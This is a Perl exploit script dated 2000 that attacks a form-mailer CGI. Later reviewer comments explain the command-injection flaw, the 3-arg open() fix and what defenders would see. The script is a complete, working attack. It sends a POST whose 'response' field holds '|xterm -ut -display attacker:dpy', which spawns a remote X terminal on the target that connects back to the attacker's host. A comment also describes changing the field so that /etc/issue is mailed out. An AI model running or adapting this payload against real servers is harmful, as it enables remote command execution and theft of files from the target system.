#!/usr/bin/perl -w
## -- Cliff's Form Mailer Version 1.0 exploit --
## (http://www.shavenferret.com/scripts)
##
## This exploit will spawn a xterm from $target
## to $attacker:$dpy. Some tweaking may be needed.
##
## - teleh0r@doglover.com / anno 2000 -
## http://teleh0r.cjb.net
#
# Reviewer notes (a defensive reading of the script below):
#
#   Vulnerability class exercised: the "response" form field is sent as
#   "|xterm ..." (URL-encoded "%7C").  A leading "|" is only meaningful if
#   the target CGI hands that field to a Perl 2-arg open() (or a similar
#   shell-reaching call), which treats "|cmd" as a command to run.  The CGI
#   itself is not on this page, so that is an inference from the payload.
#   The server-side fix is the standard one: 3-arg open(), and validation
#   of any form field that names a file against an allow-list.
#
#   What a defender would see: a POST to /cgi-bin/form.cgi whose body has a
#   field value beginning with %7C, an xterm process spawned as a child of
#   the web server, and an outbound X11 connection from the web host.

use strict;
use Socket;

# Three positional arguments are required: target host, attacker host and
# X display number.  The argument names in the usage string appear to have
# been lost to extraction; the literal is left as found.
if (@ARGV < 3) {
    print("Usage: $0 \n");
    exit(1);
}

my($target,$attacker,$dpy,$length,$command, $agent,$sploit,$iaddr,$paddr,$proto);
($target,$attacker,$dpy) = @ARGV;

# Only checks that $dpy contains at least one digit, not that it is purely
# numeric.
if ($dpy !~ /\d/) {
    print("dpy must be a number, probably 0\n");
    exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/form.cgi\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

# Opens the local X server's access control to $target for the duration of
# the run; reverted with "xhost -" at the end.  $target reaches the shell
# unquoted here and below.
system("xhost + $target");

# Value sent as Content-length for the POST body below.
$length = 90 + length($attacker.$dpy);

# POST body.  %7C is "|" and %3A is ":", so the response field decodes to
# "|xterm -ut -display $attacker:$dpy".
$command = "name=hass&email=hass\@hass.com&subject=hass&body=hass&".
           "response=%7Cxterm+-ut+-display+$attacker%3A$dpy";

# If you just want /etc/issue (for example) to be mailed
# to you, then change &response in the scalar $command to
# &response=%2Fetc%2Fissue, and change &email of course ;)

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;)

# Raw HTTP/1.0 request; the blank line separates headers from the body.
$sploit= "POST /cgi-bin/form.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$command";

# Plain TCP connection to port 80 through the bareword handle SOCKET; each
# step dies with $! on failure.
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

# Short pause before the X access grant to $target is withdrawn again.
sleep(3);
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0);

# www.hack.co.za [26 July 2000]#